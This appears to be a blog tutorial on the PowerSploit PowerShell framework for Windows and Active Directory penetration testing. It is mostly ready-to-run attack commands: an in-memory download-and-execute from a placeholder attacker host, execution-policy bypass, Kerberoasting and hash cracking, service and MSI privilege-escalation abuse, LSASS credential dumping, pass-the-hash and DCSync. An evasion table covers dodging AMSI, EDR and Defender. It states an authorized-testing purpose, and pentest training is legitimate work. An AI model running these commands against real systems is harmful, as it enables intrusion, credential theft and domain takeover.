Ethical Hacking #powersploit#powershell#powerview

PowerSploit: PowerShell Penetration Testing Guide

Learn PowerSploit for Windows pentesting: PowerView for AD recon, PowerUp for privilege escalation, and Invoke-Mimikatz for credential dumping.

7 min read

PowerSploit: The PowerShell Penetration Testing Framework

PowerSploit is a collection of Microsoft PowerShell modules designed to assist penetration testers during all phases of an engagement. Originally developed by Matt Graeber and contributors, it remains one of the most referenced frameworks for Windows and Active Directory security testing. Its three pillars — PowerView (AD reconnaissance), PowerUp (privilege escalation), and Invoke-Mimikatz (credential dumping) — cover the core post-exploitation workflow on Windows systems.

Legal notice: PowerSploit must only be used on systems you own or have explicit written authorization to test. Several modules trigger security software and will be flagged in production environments.

Setup and Loading

PowerSploit is available on GitHub. On your attacker machine or test system:

# Clone the repository
git clone https://github.com/PowerShellMafia/PowerSploit.git

# Navigate to the module directory
cd PowerSploit

# Check execution policy (may need to bypass)
Get-ExecutionPolicy

Bypassing Execution Policy

PowerShell’s execution policy prevents unsigned scripts from running by default. During authorized assessments, bypass it:

# Per-process bypass (most common, least persistent)
powershell.exe -ExecutionPolicy Bypass -File script.ps1

# In-session bypass
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

# From command prompt
powershell -ep bypass

In-Memory Loading (AMSI Bypass Consideration)

Loading modules directly from a URL avoids writing to disk:

# Load directly into memory from a hosted location
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/PowerView.ps1')

# Or use iwr (Invoke-WebRequest)
IEX (iwr http://attacker.com/PowerView.ps1 -UseBasicParsing)

Note: Modern Windows Defender’s AMSI (Antimalware Scan Interface) scans in-memory scripts too. AMSI bypass is a separate topic, but tools like amsi.fail provide updated bypass snippets for lab use.

Part 1: PowerView — Active Directory Reconnaissance

PowerView replaces many AD queries that previously required RSAT tools or admin rights. It works with standard domain user credentials.

Import the Module

Import-Module .\Recon\PowerView.ps1
# Or after IEX loading, functions are available immediately

Domain and Forest Enumeration

# Get domain information
Get-Domain
Get-DomainController

# Get forest information (multi-domain environments)
Get-Forest
Get-ForestDomain

# Get domain trusts
Get-DomainTrust
# Map all trusts in the forest
Get-ForestTrust

User Enumeration

# List all domain users
Get-DomainUser

# Get detailed info on a specific user
Get-DomainUser -Identity jsmith

# Find users with specific attributes
Get-DomainUser -SPN              # Kerberoastable accounts (have SPNs)
Get-DomainUser -AllowDelegation  # Accounts allowed for unconstrained delegation
Get-DomainUser -AdminCount       # Protected users (AdminSDHolder managed)

# Find users with "password" in description (often contain cleartext passwords)
Get-DomainUser | Where-Object {$_.description -like "*pass*"} | Select samaccountname, description

Group Enumeration

# List all domain groups
Get-DomainGroup

# Get Domain Admin members
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# Get all groups a user belongs to
Get-DomainGroup -UserName jsmith

Computer Enumeration

# List all domain computers
Get-DomainComputer

# Find domain controllers
Get-DomainController

# Find computers with unconstrained delegation
Get-DomainComputer -Unconstrained

# Find computers where specific users are logged in
Find-DomainUserLocation -UserName "administrator"
Find-DomainUserLocation -GroupName "Domain Admins"

ACL Enumeration (Critical for Attack Path Mapping)

# Find interesting ACLs for a user (what can jsmith control?)
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -match "jsmith"}

# Get all ACLs on a specific object
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs

# Find GenericAll, GenericWrite, WriteDacl, WriteOwner permissions for current user
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {
    $_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteDacl|WriteOwner" -and
    $_.IdentityReferenceName -notmatch "Domain Admins|Enterprise Admins"
}

Share Enumeration

# Find shares accessible to the current user
Find-DomainShare -CheckShareAccess

# Find interesting files on accessible shares
Find-InterestingDomainShareFile -Include "*.txt","*.xml","*.config","*.ps1","*.bat"

Kerberoasting with PowerView

# Find Kerberoastable accounts (users with SPNs)
Get-DomainUser -SPN | Select samaccountname, serviceprincipalname

# Request service tickets (triggers SPNs and gets crackable TGS tickets)
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File -Encoding ASCII hashes.txt

Then crack with Hashcat on your attacker machine:

hashcat -m 13100 hashes.txt rockyou.txt --force

Part 2: PowerUp — Privilege Escalation

PowerUp finds common Windows privilege escalation vectors on the local system.

Import and Run All Checks

Import-Module .\Privesc\PowerUp.ps1

# Run all checks at once
Invoke-AllChecks

Invoke-AllChecks tests for:

  • Unquoted service paths
  • Writable service binary paths
  • Modifiable service registry keys
  • AlwaysInstallElevated registry setting
  • Weak registry permissions
  • DLL hijacking opportunities
  • Scheduled task weaknesses

Key Checks and Exploitation

Unquoted Service Path:

# Find services with unquoted paths containing spaces
Get-UnquotedService

# Automatically exploit (place a malicious binary in the vulnerable path)
Write-ServiceBinary -ServiceName "VulnerableService" -Path "C:\Program Files\Service\evil.exe"
Invoke-ServiceAbuse -ServiceName "VulnerableService"

Writable Service Binary:

# Find services where the binary path is writable
Get-ModifiableServiceFile

# Exploit by replacing the binary
Install-ServiceBinary -ServiceName "WriteableService"

AlwaysInstallElevated:

# Check if enabled (both HKLM and HKCU must be 1)
Get-RegistryAlwaysInstallElevated

# If enabled, create a malicious MSI and install it as SYSTEM
Write-UserAddMSI    # Creates an MSI that adds a local admin user

Modifiable Registry AutoRuns:

# Find registry auto-run entries pointing to writable locations
Get-ModifiableRegistryAutoRun

# Shows paths you can replace with a malicious binary
# Replacement runs next time the associated user logs in

Part 3: Invoke-Mimikatz — Credential Dumping

PowerSploit includes a PowerShell port of Mimikatz that runs entirely in memory.

Basic Credential Dump (Requires Local Admin)

Import-Module .\Exfiltration\Invoke-Mimikatz.ps1

# Dump all credentials from LSASS
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

Output includes:

  • NTLM hashes for all logged-in users
  • Cleartext passwords (if WDigest is enabled or on older systems)
  • Kerberos tickets

Remote Credential Dumping

# Dump credentials from a remote machine (requires admin on target)
Invoke-Mimikatz -ComputerName dc01.domain.local

# Dump from multiple machines
"server01","server02","dc01" | ForEach-Object { Invoke-Mimikatz -ComputerName $_ }

Pass-the-Hash with Invoke-Mimikatz

# Inject an NTLM hash to impersonate a user
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:HASH_HERE /run:powershell.exe"'

This opens a new PowerShell window running as Administrator using only the NTLM hash — no plaintext password required.

DCSync via Invoke-Mimikatz

# Replicate all domain credentials (requires DA or DCSync rights)
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.local /all /csv"'

# Single account
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.local /user:krbtgt"'

Operational Security Considerations

RiskMitigation
AMSI detection of scriptsUse AMSI bypass before loading; obfuscate strings
EDR flagging Invoke-MimikatzUse direct LSASS dump alternatives (ProcDump, comsvcs.dll)
Windows Defender signaturesLoad from memory, avoid writing to disk
PowerShell Script Block LoggingLogged in Event ID 4104 — assume all commands are logged
Constrained Language ModeSome environments restrict PowerShell — use CLM bypass or compiled C# alternatives

PowerSploit Quick Reference

# AD Recon
Get-DomainUser -SPN                          # Kerberoastable users
Get-DomainComputer -Unconstrained            # Unconstrained delegation
Find-DomainUserLocation -GroupName "DA"      # Where DAs are logged in
Find-InterestingDomainAcl -ResolveGUIDs      # Interesting permissions

# Privilege Escalation
Invoke-AllChecks                             # Run all PowerUp checks
Get-UnquotedService                          # Unquoted paths
Get-ModifiableServiceFile                    # Writable service binaries

# Credential Dumping
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'   # Local dump
Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"' # DCSync

Summary

PowerSploit’s three core modules cover the post-exploitation trifecta in Windows environments: PowerView maps the AD attack surface revealing trust relationships, Kerberoastable accounts, and ACL misconfigurations; PowerUp surfaces local privilege escalation vectors that get you from standard user to SYSTEM; and Invoke-Mimikatz harvests credentials to enable lateral movement and domain takeover. Together, they form a complete PowerShell-native toolkit for authorized Windows penetration testing engagements.

#privilege-escalation #powerup #powerview #powershell #powersploit

// related articles

ethical-hacking Linux Privilege Escalation Techniques and Tools 7 min read ethical-hacking Linux Post-Exploitation Enumeration Guide 7 min read ethical-hacking Windows Privilege Escalation Guide with WinPEAS 7 min read